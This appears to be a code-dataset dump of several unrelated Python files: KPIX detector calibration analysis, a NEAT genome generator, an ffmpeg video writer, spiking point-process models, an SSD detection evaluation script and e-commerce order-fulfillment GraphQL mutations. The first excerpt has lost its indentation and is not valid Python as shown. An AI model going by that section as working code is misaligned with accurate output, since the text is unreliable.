# l.append(' ')
# else:
# l.append(f'{row[c]:04x} ')
# print(''.join(l))
class KpixRunAnalyzer(rogue.interfaces.stream.Slave):
def __init__(self):
rogue.interfaces.stream.Slave.__init__(self)
self.parsedData = []
def _acceptFrame(self, frame):
if frame.getError():
print('Frame Error!')
return
ba = bytearray(frame.getPayload())
frame.read(ba, 0)
if frame.getChannel() == 0:
self.parsedData.append(parseFrame(ba))
else:
print('Got YAML Frame')
def process(self):
#data = [[[[] for bucket in range(4)] for chanel in range(1024)] for kpix in range(24)]
self.dictData = nesteddict()
for frame in self.parsedData:
runtime = frame['runtime']
for sample in frame['data']:
print(sample)
kpix = sample['kpixId']
channel = sample['col']*32+sample['row']
bucket = sample['bucket']
adc = sample['adc']
self.dictData[kpix][channel][bucket][runtime] = adc
def noise(self):
for kpix, channels in self.dictData.items():
for channel, buckets in channels.items():
for bucket, adcs in buckets.items():
a = np.array(list(adcs.values()))
buckets[bucket]['mean'] = np.mean(a)
buckets[bucket]['noise'] = np.std(a)
class KpixCalibration(rogue.interfaces.stream.Slave):
def __init__(self):
rogue.interfaces.stream.Slave.__init__(self)
#self.CalState = 'Idle'
#self.CalChannel = 0
#self.CalDac = 0
self.state = {}
self.dataDict = nesteddict()
#self.runtimes = nesteddict()
#self.injections = {}
#self.baselines = {}
#self.counts = {}
self.frameCount = 0
#self.sampleCount = 0
#@profile
def _acceptFrame(self, frame):
if frame.getError():
print('Frame Error!')
#return
#if self.state["DesyTrackerRoot"]["DesyTrackerRunControl"]['CalState'] == "Inject":
# return
ba = np.zeros(frame.getPayload(), dtype=np.uint8)
frame.read(ba, 0)
# active = set([0,6])
# done = []
if frame.getChannel() == 0:
runControlDict = self.state["DesyTrackerRoot"]["DesyTrackerRunControl"]
calState = runControlDict['CalState']
calChannel = runControlDict['CalChannel']
calDac = runControlDict['CalDac']
#calMeanCount = runControlDict['CalMeanCount']
#calDacCount = runControlDict['CalDacCount']
#numDacs = (runControlDict['CalDacMax']-runControlDict['CalDacMin'])/runControlDict['CalDacStep']
#dacCount = runControlDict['CalDacCount']
#parsedFrame = parseFrame(ba)
self.frameCount += 1
sample = KpixSample(0)
#(rawSamples[i:i+8] for i in range(0, len(rawSamples), 8))
data = ba[32:-4]
#size = len(data)
dv = data.view()
dv.shape = (len(data)//8, 8)
runtime = int.from_bytes(ba[4:12], 'little')
print(f'Got Data Frame. Runtime: {runtime}')
#print(f'CalState: {calState.__dict__}')
for seg in dv:
#word =
#self.sampleCount += 1
#sample.asWord = int.from_bytes(seg, 'little', signed=False)
sample.asWord = seg.ctypes.data_as(ctypes.POINTER(ctypes.c_uint64)).contents.value
#print(f'Kpix: {sample.fields.kpixId}, row: {sample.fields.row}, col: {sample.fields.col}, bucket: {sample.fields.bucket}')
if sample.fields.type != 0:
continue # Temperature type
fields = sample.fields
channel = fields.col*32 + fields.row
kpix = fields.kpixId
bucket = fields.bucket
adc = fields.adc
#print(f'Got sample: kpix: {kpix}, channel {channel}, bucket: {bucket}, adc: {adc}')
if calState == 'Baseline':
pass
#if kpix not in self.baselines:
#self.baselines[kpix] = np.zeros([1024, 4, calMeanCount], dtype=np.uint16)
#self.counts[kpix] = np.zeros([1024,4], dtype=np.uint8)
# dict cheat
# This works
#self.dataDict[kpix][channel][bucket]['baseline']['data'][runtime] = adc
#count = self.counts[kpix][channel, bucket]
#print(f'Kpix: {kpix}, channel: {channel}, bucket: {bucket}, type: {sample.fields.type}, adc: {adc}')
#self.baselines[kpix][channel, bucket, count] = adc
#self.counts[kpix][channel, bucket] = count + 1
elif calState == 'Inject':
#if kpix not in self.injections:
# self.injections[kpix] = np.zeros([1024, 4, 256, calDacCount], dtype=np.uint16)
# self.counts[kpix] = np.zeros([1024, 4, 256], dtype=np.uint8)
if channel == calChannel:
#count = self.counts[kpix][channel, bucket, calDac]
#print(f'Kpix: {kpix}, channel: {channel}, bucket: {bucket}, dac: {calDac}, count: {count}, type: {sample.fields.type}')
#self.injections[kpix][channel, bucket, calDac, count] = adc
#self.counts[kpix][channel, bucket, calDac] = count + 1
if len(self.dataDict[kpix][channel][bucket]['injection'][calDac]) > 0:
print(f"Current: {self.dataDict[kpix][channel][bucket]['injection'][calDac]}")
print(f'New sample: kpix: {kpix}, channel {channel}, bucket: {bucket}, adc: {adc}')
self.dataDict[kpix][channel][bucket]['injection'][calDac][runtime] = adc
elif frame.getChannel() == 6:
print("Got YAML Frame")
yamlString = bytearray(ba).rstrip(bytearray(1)).decode('utf-8')
yamlDict = pyrogue.yamlToData(yamlString)
#print(yamlDict)
pyrogue.dictUpdate(self.state, yamlDict)
else:
print(f'Got frame from channel: {frame.getChannel()}')
# print(
def baselines(self):
ret = nesteddict()
for kpix, channels in self.dataDict.items():
for channel, buckets in channels.items():
for bucket, b in buckets.items():
a = np.array(list(b['baseline']['data'].values()))
mean = np.mean(a)
std = np.std(a)
b['baseline']['mean'] = mean
b['baseline']['std'] = std
ret[kpix][channel][bucket] = (mean, std)
print(f"Channel {channel}, bucket {bucket}: mean = {mean}, std = {std}")
return ret
def plot_baseline_heatmaps(self, kpix):
fig = plt.figure(1)
plt.xlabel('Channel')
plt.ylabel('ADC')
        plt.title('Baseline histogram all channels')
for bucket in range(4):
d = self.baselines[kpix][:, bucket]
ymin = np.min(d)
ymax = np.max(d)
print(f'minAdc={ymin}, maxAdc={ymax}')
bins = list(range(ymin, ymax+1))
# Create a histogram for each channel
h2d = np.array([np.histogram(x, bins=bins)[0] for x in d])
zmax = np.max(h2d)
zmin = np.min(h2d)
print(f'minHits={zmin}, maxHits={zmax}')
ax = fig.add_subplot(4, 1, bucket+1)
#plt.title(f'Bucket {bucket}')
img = ax.imshow(h2d.T, vmin=zmin, vmax=zmax, extent=[0, len(h2d), ymin, ymax], aspect='auto')
fig.colorbar(img)
plt.show()
def plot_baseline_heatmaps_dict(self, kpix):
fig = plt.figure()
        fig.suptitle('Baseline histogram all channels')
for bucket in range(4):
keys = self.dataDict[kpix].keys()
d = [list(self.dataDict[kpix][channel][bucket]['baseline']['data'].values()) for channel in keys]
d = np.array(d)
ymin = np.min(d)
ymax = np.max(d)
bins = list(range(ymin, ymax+1))
# Create a histogram for each channel
h2d = np.array([np.histogram(x, bins=bins)[0] for x in d])
zmax = np.max(h2d)
zmin = np.min(h2d)
print(f'minHits={zmin}, maxHits={zmax}')
ax = fig.add_subplot(4, 1, bucket+1)
ax.set_title(f'Bucket {bucket}')
ax.set_xlabel('Channel')
ax.set_ylabel('ADC')
img = ax.imshow(h2d.T, vmin=zmin, vmax=zmax, extent=[0, len(h2d), ymin, ymax], aspect='auto')
plt.colorbar(img, ax=ax)
plt.show()
def plot_injection_fit(self, kpix, channel):
plt.figure(1)
plt.xlabel('DAC')
plt.ylabel('ADC')
plt.title(f'Calibration fits for channel {channel}')
for bucket in range(4):
plt.subplot(4, 1, bucket+1)
plt.title(f'Bucket {bucket}')
d = self.injections[kpix][channel, bucket, 200:]
dacs = np.array(list(range(200,256)))
adcs = d
x = np.repeat(dacs, len(adcs[0]))
y = adcs.flatten()
regression = stats.linregress(x,y)
m, b, r, p, err = regression
plt.plot(x, y, 'o', label='samples')
plt.plot(x, m*x+b, '--r', label='fit')
plt.text(np.min(x)+10, np.max(y)-100, f'm={m}, b={b}, r={r}, p={p}, err={err}')
plt.legend()
plt.show()
# print('-------')
# if typeField == 0:
# print('Parsed Data Sample:')
# print(f'KPIX: {kpixId}')
# print(f'Timestamp: {timestamp}')
# print(f'Row: {row}')
# print(f'Col: {col}')
# print(f'ADC: {adc:04x}')
# print(f'Bucket: {bucket}')
# print(f'TriggerFlag: {triggerFlag}')
# print(f'RangeFlag: {rangeFlag}')
# print(f'BadCountFlag: {badCountFlag}')
# print(f'Emptyflag: {emptyFlag}')
# elif typeField == 1:
# print('Parsed Temperature Sample')
# print(f'KPIX: {kpixId}')
# print(f'Temperature: {getField(value, 7, 0)}')
# print(f'TempCount: {getField(value, 31, 24)}')
# else:
# print(f'Unknown type field: {typeField}')
# print('-------')
|
the-stack_106_30624 | #!/usr/bin/env python
def main():
np_hidden = 0
np_input = 1
np_output = 2
np_bias = 3
nt_neuron = 0
nt_sensor = 1
num_inputs = 19 + 18 + 0
num_outputs = 12
nodes = []
genes = []
# next_node_id = 1
# def get_next_node_id()
# nonlocal next_node_id
# a = next_node_id
# next_node_id += 1
# return a
trait_num = 0
nodes.append(f'node 1 {trait_num} {nt_sensor} {np_bias}')
for input_id in range(2, num_inputs + 2):
nodes.append(f'node {input_id} {trait_num} {nt_sensor} {np_input}')
for output_id in range(num_inputs + 2, num_inputs + 2 + num_outputs):
nodes.append(f'node {output_id} {trait_num} {nt_neuron} {np_output}')
trait_num = 1
innov = 0
for input_id in range(2, num_inputs + 2):
for output_id in range(num_inputs + 2, num_inputs + 2 + num_outputs):
innov += 1
genes.append(f'gene {trait_num} {input_id} {output_id} 0.0 0 {innov} 0 1')
for node in nodes:
print(node)
for gene in genes:
print(gene)
if __name__ == '__main__':
main()
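# Output note (not part of the original source): running this script prints a
# minimal NEAT starter genome to stdout, consisting of one bias sensor node,
# `num_inputs` input sensor nodes, `num_outputs` output neuron nodes, and one
# 'gene' line for every input/output pair so the initial topology is fully wired.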
|
the-stack_106_30625 | from subprocess import DEVNULL, PIPE, Popen
DEFAULT_FPS = 24
DEFAULT_OUTPUT_PATH = "video.mkv"
class VideoWriter:
def __init__(self, fps=DEFAULT_FPS, output_path=DEFAULT_OUTPUT_PATH):
args = [
"ffmpeg",
"-y",
"-f",
"image2pipe",
"-vcodec",
"png",
"-framerate",
str(fps),
"-i",
"-",
"-vcodec",
"libx264",
output_path,
]
self.process = Popen(args, stdin=PIPE, stdout=DEVNULL, stderr=DEVNULL)
def add_frame(self, frame):
frame.write_to_png(self.process.stdin)
def __del__(self):
self.process.stdin.close()
self.process.wait()
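# Illustrative usage sketch (not part of the original source). It assumes pycairo
# is installed and that ffmpeg is on PATH; add_frame() accepts any object with a
# write_to_png(fileobj) method, such as a cairo ImageSurface.
if __name__ == "__main__":
    import cairo
    writer = VideoWriter(fps=DEFAULT_FPS, output_path="demo.mkv")
    surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 320, 240)
    ctx = cairo.Context(surface)
    for i in range(48):  # two seconds of frames at 24 fps
        ctx.set_source_rgb(i / 48, 0.2, 0.8)
        ctx.paint()
        writer.add_frame(surface)
    del writer  # closes ffmpeg's stdin and waits for encoding to finish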
|
the-stack_106_30626 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
''' Title '''
__author__ = 'Hiroshi Kajino <[email protected]>'
__copyright__ = 'Copyright IBM Corp. 2020, 2021'
from copy import deepcopy
from .base import POMultivariatePointProcess
from .thinning import MultivariateThinningAlgorithmForPOMixin
from ..pp.snn import SNNBase
from ..pp.activation import (SigmoidActivationMixin,
ExpActivationMixin,
HardtanhActivationMixin)
class POSNNBase(SNNBase, POMultivariatePointProcess):
def __init__(self,
n_obs_neurons,
n_hidden_neurons,
connection_tensor=None,
n_inducing_points=5,
low=0.0,
high=10.0,
kernel_kwargs={},
activation_kwargs={},
lmbd=1e-1,
seed=43,
**kwargs):
super().__init__(n_neurons=n_obs_neurons+n_hidden_neurons,
connection_tensor=connection_tensor,
n_inducing_points=n_inducing_points,
low=low,
high=high,
kernel_kwargs=kernel_kwargs,
activation_kwargs=activation_kwargs,
lmbd=lmbd,
seed=seed,
**kwargs)
self.n_obs_neurons = n_obs_neurons
self.n_hidden_neurons = n_hidden_neurons
self.obs_neuron_list = list(range(n_obs_neurons))
self.hidden_neuron_list = list(range(n_obs_neurons,
n_obs_neurons+n_hidden_neurons))
@property
def obs_dim(self):
return self.n_obs_neurons
@property
def hidden_dim(self):
return self.n_hidden_neurons
def transfer_model(self, train_model):
self.n_obs_neurons = train_model.n_obs_neurons
self.n_hidden_neurons = train_model.n_hidden_neurons
self.n_neurons = train_model.n_neurons
self.n_inducing_points = train_model.n_inducing_points
self.connection_tensor = train_model.connection_tensor
for each_param in self.params:
self.params[each_param].data = deepcopy(train_model.params[each_param].data)
# reinforce estimator
class SigmoidPOSNN(MultivariateThinningAlgorithmForPOMixin,
SigmoidActivationMixin,
POSNNBase):
pass
class ExpPOSNN(MultivariateThinningAlgorithmForPOMixin,
ExpActivationMixin,
POSNNBase):
pass
class HardtanhPOSNN(MultivariateThinningAlgorithmForPOMixin,
HardtanhActivationMixin,
POSNNBase):
pass
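# Illustrative construction of one of the variants above (not part of the original
# source; keyword values are placeholders and the real behaviour comes from the
# imported base classes and mixins):
#
#     model = SigmoidPOSNN(n_obs_neurons=3,
#                          n_hidden_neurons=2,
#                          n_inducing_points=5,
#                          low=0.0, high=10.0,
#                          lmbd=1e-1, seed=43)
#     model.obs_dim, model.hidden_dim   # -> (3, 2)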
|
the-stack_106_30628 | from __future__ import print_function
import sys
import os
import pickle
import argparse
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
import torchvision.transforms as transforms
import numpy as np
from torch.autograd import Variable
from data import *
from ssd import build_ssd
# from data import VOCroot,COCOroot
# from data import AnnotationTransform, COCODetection, VOCDetection, BaseTransform, VOC_300,VOC_512,COCO_300,COCO_512, COCO_mobile_300
import torch.utils.data as data
from layers.functions import Detect,PriorBox
from rfb_tools.nms_wrapper import nms
from rfb_tools.timer import Timer
parser = argparse.ArgumentParser(description='Receptive Field Block Net')
parser.add_argument('-v', '--version', default='RFB_vgg',
help='RFB_vgg ,RFB_E_vgg or RFB_mobile version.')
parser.add_argument('-s', '--size', default='300',
help='300 or 512 input size.')
parser.add_argument('-d', '--dataset', default='COCO',
help='VOC or COCO version')
parser.add_argument('-m', '--trained_model', default='weights/COCO.pth',
type=str, help='Trained state_dict file path to open')
parser.add_argument('--save_folder', default='eval/', type=str,
help='Dir to save results')
parser.add_argument('--cuda', default=True, type=bool,
help='Use cuda to train model')
parser.add_argument('--cpu', default=False, type=bool,
help='Use cpu nms')
parser.add_argument('--retest', default=False, type=bool,
help='test cache results')
args = parser.parse_args()
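# Example invocation (illustrative; the script name and weight path are placeholders):
#   python test_RFB.py -d VOC -s 300 -m weights/COCO.pth --save_folder eval/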
if not os.path.exists(args.save_folder):
os.mkdir(args.save_folder)
'''
if args.dataset == 'VOC':
cfg = (VOC_300, VOC_512)[args.size == '512']
else:
cfg = (COCO_300, COCO_512)[args.size == '512']
'''
if args.dataset == 'VOC':
cfg = (voc, voc)[args.size == '512']
else:
cfg = (coco, coco)[args.size == '512']
'''
if args.version == 'RFB_vgg':
from models.RFB_Net_vgg import build_net
elif args.version == 'RFB_E_vgg':
from models.RFB_Net_E_vgg import build_net
elif args.version == 'RFB_mobile':
from models.RFB_Net_mobile import build_net
cfg = COCO_mobile_300
else:
print('Unkown version!')
'''
priorbox = PriorBox(cfg)
with torch.no_grad():
priors = priorbox.forward()
if args.cuda:
priors = priors.cuda()
def test_net(save_folder, net, cuda, testset, transform, max_per_image=300, thresh=0.005):
if not os.path.exists(save_folder):
os.mkdir(save_folder)
# dump predictions and assoc. ground truth to text file for now
num_images = len(testset)
num_classes = (21, 81)[args.dataset == 'COCO']
all_boxes = [[[] for _ in range(num_images)]
for _ in range(num_classes)]
_t = {'im_detect': Timer(), 'misc': Timer()}
det_file = os.path.join(save_folder, 'detections.pkl')
if args.retest:
f = open(det_file, 'rb')
all_boxes = pickle.load(f)
print('Evaluating detections')
testset.evaluate_detections(all_boxes, save_folder)
        print('Evaluating done')
return
for i in range(num_images):
img, _, h, w = testset.pull_item(i)
scale = torch.Tensor([w, h,
w, h])
with torch.no_grad():
# x = transform(img).unsqueeze(0)
x = img.unsqueeze(0)
if cuda:
x = x.cuda()
scale = scale.cuda()
_t['im_detect'].tic()
detections = net(x) # forward pass
detections.detach_()
detect_time = _t['im_detect'].toc(average=False)
# skip j = 0, because it's the background class
for j in range(1, detections.size(1)):
dets = detections[0, j, :]
mask = dets[:, 0].gt(0.).expand(5, dets.size(0)).t()
dets = torch.masked_select(dets, mask).view(-1, 5)
if dets.size(0) == 0:
continue
boxes = dets[:, 1:]
boxes[:, 0] *= w
boxes[:, 2] *= w
boxes[:, 1] *= h
boxes[:, 3] *= h
scores = dets[:, 0].cpu().numpy()
cls_dets = np.hstack((boxes.cpu().numpy(),
scores[:, np.newaxis])).astype(np.float32,
copy=False)
all_boxes[j][i] = cls_dets
'''
# boxes, scores = detector.forward(out,priors)
detect_time = _t['im_detect'].toc()
boxes = boxes[0]
scores = scores[0]
boxes *= scale
boxes = boxes.cpu().numpy()
scores = scores.cpu().numpy()
# scale each detection back up to the image
_t['misc'].tic()
for j in range(1, num_classes):
inds = np.where(scores[:, j] > thresh)[0]
if len(inds) == 0:
all_boxes[j][i] = np.empty([0, 5], dtype=np.float32)
continue
c_bboxes = boxes[inds]
c_scores = scores[inds, j]
c_dets = np.hstack((c_bboxes, c_scores[:, np.newaxis])).astype(
np.float32, copy=False)
keep = nms(c_dets, 0.45, force_cpu=args.cpu)
c_dets = c_dets[keep, :]
all_boxes[j][i] = c_dets
if max_per_image > 0:
image_scores = np.hstack([all_boxes[j][i][:, -1] for j in range(1,num_classes)])
if len(image_scores) > max_per_image:
image_thresh = np.sort(image_scores)[-max_per_image]
for j in range(1, num_classes):
keep = np.where(all_boxes[j][i][:, -1] >= image_thresh)[0]
all_boxes[j][i] = all_boxes[j][i][keep, :]
nms_time = _t['misc'].toc()
'''
if i % 20 == 0:
print('im_detect: {:d}/{:d} {:.3f}s'
.format(i + 1, num_images, detect_time))
_t['im_detect'].clear()
with open(det_file, 'wb') as f:
pickle.dump(all_boxes, f, pickle.HIGHEST_PROTOCOL)
print('Evaluating detections')
testset.evaluate_detections(all_boxes, save_folder)
if __name__ == '__main__':
# load net
img_dim = (300,512)[args.size=='512']
num_classes = (21, 81)[args.dataset == 'COCO']
net = build_ssd('test', img_dim, num_classes) # initialize detector
state_dict = torch.load(args.trained_model)
# create new OrderedDict that does not contain `module.`
from collections import OrderedDict
new_state_dict = OrderedDict()
for k, v in state_dict.items():
head = k[:7]
if head == 'module.':
name = k[7:] # remove `module.`
else:
name = k
new_state_dict[name] = v
net.load_state_dict(new_state_dict)
net.eval()
print('Finished loading model!')
print(net)
dataset_mean = (104, 117, 123)
# load data
if args.dataset == 'VOC':
testset = VOCDetection(
VOC_ROOT, [('2007', 'test')], None)
elif args.dataset == 'COCO':
testset = COCODetection(
# COCO_ROOT, [('2014', 'minival')], None)
COCO_ROOT, [('2015', 'test-dev')], BaseTransform(300, dataset_mean), None)
else:
        print('Only VOC and COCO datasets are supported now!')
if args.cuda:
net = net.cuda()
cudnn.benchmark = True
else:
net = net.cpu()
# evaluation
top_k = (300, 200)[args.dataset == 'COCO']
# top_k = 200
save_folder = os.path.join(args.save_folder, args.dataset)
test_net(save_folder, net, args.cuda, testset,
BaseTransform(net.size, dataset_mean),
top_k, thresh=0.01)
print('Finished')
'''
detector = Detect(num_classes,0, 200, 0.01, 0.45)
save_folder = os.path.join(args.save_folder,args.dataset)
rgb_means = ((104, 117, 123),(103.94,116.78,123.68))[args.version == 'RFB_mobile']
test_net(save_folder, net, detector, args.cuda, testset,
BaseTransform(net.size, rgb_means, (2, 0, 1)),
top_k, thresh=0.01)
''' |
the-stack_106_30630 | from collections import defaultdict
import graphene
from django.core.exceptions import ValidationError
from django.template.defaultfilters import pluralize
from ....core.exceptions import InsufficientStock
from ....core.permissions import OrderPermissions
from ....core.tracing import traced_atomic_transaction
from ....giftcard.utils import get_gift_card_lines, gift_cards_create
from ....order import FulfillmentLineData, FulfillmentStatus, OrderLineData
from ....order import models as order_models
from ....order.actions import (
approve_fulfillment,
cancel_fulfillment,
cancel_waiting_fulfillment,
create_fulfillments,
create_fulfillments_for_returned_products,
create_refund_fulfillment,
fulfillment_tracking_updated,
)
from ....order.error_codes import OrderErrorCode
from ....order.notifications import send_fulfillment_update
from ...core.descriptions import ADDED_IN_31
from ...core.mutations import BaseMutation
from ...core.scalars import PositiveDecimal
from ...core.types.common import OrderError
from ...core.utils import get_duplicated_values
from ...utils import resolve_global_ids_to_primary_keys
from ...warehouse.types import Warehouse
from ..types import Fulfillment, FulfillmentLine, Order, OrderLine
from ..utils import prepare_insufficient_stock_order_validation_errors
class OrderFulfillStockInput(graphene.InputObjectType):
quantity = graphene.Int(
description="The number of line items to be fulfilled from given warehouse.",
required=True,
)
warehouse = graphene.ID(
description="ID of the warehouse from which the item will be fulfilled.",
required=True,
)
class OrderFulfillLineInput(graphene.InputObjectType):
order_line_id = graphene.ID(
description="The ID of the order line.", name="orderLineId"
)
stocks = graphene.List(
graphene.NonNull(OrderFulfillStockInput),
required=True,
description="List of stock items to create.",
)
class OrderFulfillInput(graphene.InputObjectType):
lines = graphene.List(
graphene.NonNull(OrderFulfillLineInput),
required=True,
description="List of items informing how to fulfill the order.",
)
notify_customer = graphene.Boolean(
description="If true, send an email notification to the customer."
)
class FulfillmentUpdateTrackingInput(graphene.InputObjectType):
tracking_number = graphene.String(description="Fulfillment tracking number.")
notify_customer = graphene.Boolean(
default_value=False,
description="If true, send an email notification to the customer.",
)
class OrderFulfill(BaseMutation):
fulfillments = graphene.List(
Fulfillment, description="List of created fulfillments."
)
order = graphene.Field(Order, description="Fulfilled order.")
class Arguments:
order = graphene.ID(
description="ID of the order to be fulfilled.", name="order"
)
input = OrderFulfillInput(
required=True, description="Fields required to create a fulfillment."
)
class Meta:
description = "Creates new fulfillments for an order."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
@classmethod
def clean_lines(cls, order_lines, quantities):
for order_line in order_lines:
line_total_quantity = quantities[order_line.pk]
line_quantity_unfulfilled = order_line.quantity_unfulfilled
if line_total_quantity > line_quantity_unfulfilled:
msg = (
"Only %(quantity)d item%(item_pluralize)s remaining "
"to fulfill: %(order_line)s."
) % {
"quantity": line_quantity_unfulfilled,
"item_pluralize": pluralize(line_quantity_unfulfilled),
"order_line": order_line,
}
order_line_global_id = graphene.Node.to_global_id(
"OrderLine", order_line.pk
)
raise ValidationError(
{
"order_line_id": ValidationError(
msg,
code=OrderErrorCode.FULFILL_ORDER_LINE,
params={"order_lines": [order_line_global_id]},
)
}
)
@classmethod
def check_warehouses_for_duplicates(cls, warehouse_ids):
for warehouse_ids_for_line in warehouse_ids:
duplicates = get_duplicated_values(warehouse_ids_for_line)
if duplicates:
raise ValidationError(
{
"warehouse": ValidationError(
"Duplicated warehouse ID.",
code=OrderErrorCode.DUPLICATED_INPUT_ITEM,
params={"warehouse": duplicates.pop()},
)
}
)
@classmethod
def check_lines_for_duplicates(cls, lines_ids):
duplicates = get_duplicated_values(lines_ids)
if duplicates:
raise ValidationError(
{
"orderLineId": ValidationError(
"Duplicated order line ID.",
code=OrderErrorCode.DUPLICATED_INPUT_ITEM,
params={"order_lines": [duplicates.pop()]},
)
}
)
@classmethod
def check_total_quantity_of_items(cls, quantities_for_lines):
flat_quantities = sum(quantities_for_lines, [])
if sum(flat_quantities) <= 0:
raise ValidationError(
{
"lines": ValidationError(
"Total quantity must be larger than 0.",
code=OrderErrorCode.ZERO_QUANTITY,
)
}
)
@classmethod
def clean_input(cls, info, order, data):
site_settings = info.context.site.settings
if not order.is_fully_paid() and (
site_settings.fulfillment_auto_approve
and not site_settings.fulfillment_allow_unpaid
):
raise ValidationError(
{
"order": ValidationError(
"Cannot fulfill unpaid order.",
code=OrderErrorCode.CANNOT_FULFILL_UNPAID_ORDER.value,
)
}
)
lines = data["lines"]
warehouse_ids_for_lines = [
[stock["warehouse"] for stock in line["stocks"]] for line in lines
]
cls.check_warehouses_for_duplicates(warehouse_ids_for_lines)
quantities_for_lines = [
[stock["quantity"] for stock in line["stocks"]] for line in lines
]
lines_ids = [line["order_line_id"] for line in lines]
cls.check_lines_for_duplicates(lines_ids)
order_lines = cls.get_nodes_or_error(
lines_ids, field="lines", only_type=OrderLine
)
order_line_id_to_total_quantity = {
order_line.pk: sum(line_quantities)
for order_line, line_quantities in zip(order_lines, quantities_for_lines)
}
cls.clean_lines(order_lines, order_line_id_to_total_quantity)
cls.check_total_quantity_of_items(quantities_for_lines)
lines_for_warehouses = defaultdict(list)
for line, order_line in zip(lines, order_lines):
for stock in line["stocks"]:
if stock["quantity"] > 0:
warehouse_pk = cls.get_global_id_or_error(
stock["warehouse"], only_type=Warehouse, field="warehouse"
)
lines_for_warehouses[warehouse_pk].append(
{"order_line": order_line, "quantity": stock["quantity"]}
)
data["order_lines"] = order_lines
data["gift_card_lines"] = cls.get_gift_card_lines(lines_ids)
data["quantities"] = order_line_id_to_total_quantity
data["lines_for_warehouses"] = lines_for_warehouses
return data
@staticmethod
def get_gift_card_lines(lines_ids):
_, pks = resolve_global_ids_to_primary_keys(
lines_ids, OrderLine, raise_error=True
)
return get_gift_card_lines(pks)
@classmethod
@traced_atomic_transaction()
def perform_mutation(cls, _root, info, order, **data):
order = cls.get_node_or_error(info, order, field="order", only_type=Order)
data = data.get("input")
cleaned_input = cls.clean_input(info, order, data)
context = info.context
user = context.user if not context.user.is_anonymous else None
app = context.app
manager = context.plugins
lines_for_warehouses = cleaned_input["lines_for_warehouses"]
notify_customer = cleaned_input.get("notify_customer", True)
gift_card_lines = cleaned_input["gift_card_lines"]
quantities = cleaned_input["quantities"]
gift_cards_create(
order,
gift_card_lines,
quantities,
context.site.settings,
user,
app,
manager,
)
try:
fulfillments = create_fulfillments(
user,
app,
order,
dict(lines_for_warehouses),
manager,
notify_customer,
approved=info.context.site.settings.fulfillment_auto_approve,
)
except InsufficientStock as exc:
errors = prepare_insufficient_stock_order_validation_errors(exc)
raise ValidationError({"stocks": errors})
return OrderFulfill(fulfillments=fulfillments, order=order)
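# Illustrative GraphQL document for the mutation above (not from this file; the
# root field name depends on how the mutation is registered in the schema and the
# IDs are placeholders):
#
#   mutation {
#     orderFulfill(
#       order: "T3JkZXI6MQ=="
#       input: {
#         lines: [{orderLineId: "T3JkZXJMaW5lOjE=",
#                  stocks: [{quantity: 1, warehouse: "V2FyZWhvdXNlOjE="}]}]
#         notifyCustomer: true
#       }
#     ) {
#       fulfillments { id }
#       order { id status }
#     }
#   }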
class FulfillmentUpdateTracking(BaseMutation):
fulfillment = graphene.Field(
Fulfillment, description="A fulfillment with updated tracking."
)
order = graphene.Field(
Order, description="Order for which fulfillment was updated."
)
class Arguments:
id = graphene.ID(required=True, description="ID of a fulfillment to update.")
input = FulfillmentUpdateTrackingInput(
required=True, description="Fields required to update a fulfillment."
)
class Meta:
description = "Updates a fulfillment for an order."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
@classmethod
def perform_mutation(cls, _root, info, **data):
fulfillment = cls.get_node_or_error(info, data.get("id"), only_type=Fulfillment)
tracking_number = data.get("input").get("tracking_number") or ""
fulfillment.tracking_number = tracking_number
fulfillment.save()
order = fulfillment.order
fulfillment_tracking_updated(
fulfillment,
info.context.user,
info.context.app,
tracking_number,
info.context.plugins,
)
input_data = data.get("input", {})
notify_customer = input_data.get("notify_customer")
if notify_customer:
send_fulfillment_update(order, fulfillment, info.context.plugins)
return FulfillmentUpdateTracking(fulfillment=fulfillment, order=order)
class FulfillmentCancelInput(graphene.InputObjectType):
warehouse_id = graphene.ID(
description="ID of a warehouse where items will be restocked. Optional "
"when fulfillment is in WAITING_FOR_APPROVAL state.",
required=False,
)
class FulfillmentCancel(BaseMutation):
fulfillment = graphene.Field(Fulfillment, description="A canceled fulfillment.")
order = graphene.Field(Order, description="Order which fulfillment was cancelled.")
class Arguments:
id = graphene.ID(required=True, description="ID of a fulfillment to cancel.")
input = FulfillmentCancelInput(
required=False, description="Fields required to cancel a fulfillment."
)
class Meta:
description = "Cancels existing fulfillment and optionally restocks items."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
@classmethod
def validate_fulfillment(cls, fulfillment, warehouse):
if not fulfillment.can_edit():
raise ValidationError(
{
"fulfillment": ValidationError(
"This fulfillment can't be canceled",
code=OrderErrorCode.CANNOT_CANCEL_FULFILLMENT,
)
}
)
if (
fulfillment.status != FulfillmentStatus.WAITING_FOR_APPROVAL
and not warehouse
):
raise ValidationError(
{
"warehouseId": ValidationError(
"This parameter is required for fulfillments which are not in "
"WAITING_FOR_APPROVAL state.",
code=OrderErrorCode.REQUIRED,
)
}
)
@classmethod
def perform_mutation(cls, _root, info, **data):
fulfillment = cls.get_node_or_error(info, data.get("id"), only_type=Fulfillment)
warehouse = None
if fulfillment.status == FulfillmentStatus.WAITING_FOR_APPROVAL:
warehouse = None
elif warehouse_id := data.get("input", {}).get("warehouse_id"):
warehouse = cls.get_node_or_error(
info, warehouse_id, only_type="Warehouse", field="warehouse_id"
)
cls.validate_fulfillment(fulfillment, warehouse)
order = fulfillment.order
if fulfillment.status == FulfillmentStatus.WAITING_FOR_APPROVAL:
fulfillment = cancel_waiting_fulfillment(
fulfillment,
info.context.user,
info.context.app,
info.context.plugins,
)
else:
fulfillment = cancel_fulfillment(
fulfillment,
info.context.user,
info.context.app,
warehouse,
info.context.plugins,
)
order.refresh_from_db(fields=["status"])
return FulfillmentCancel(fulfillment=fulfillment, order=order)
class FulfillmentApprove(BaseMutation):
fulfillment = graphene.Field(Fulfillment, description="An approved fulfillment.")
order = graphene.Field(Order, description="Order which fulfillment was approved.")
class Arguments:
id = graphene.ID(required=True, description="ID of a fulfillment to approve.")
notify_customer = graphene.Boolean(
required=True, description="True if confirmation email should be send."
)
class Meta:
description = f"{ADDED_IN_31} Approve existing fulfillment."
permissions = (OrderPermissions.MANAGE_ORDERS,)
error_type_class = OrderError
error_type_field = "order_errors"
@classmethod
def clean_input(cls, info, fulfillment):
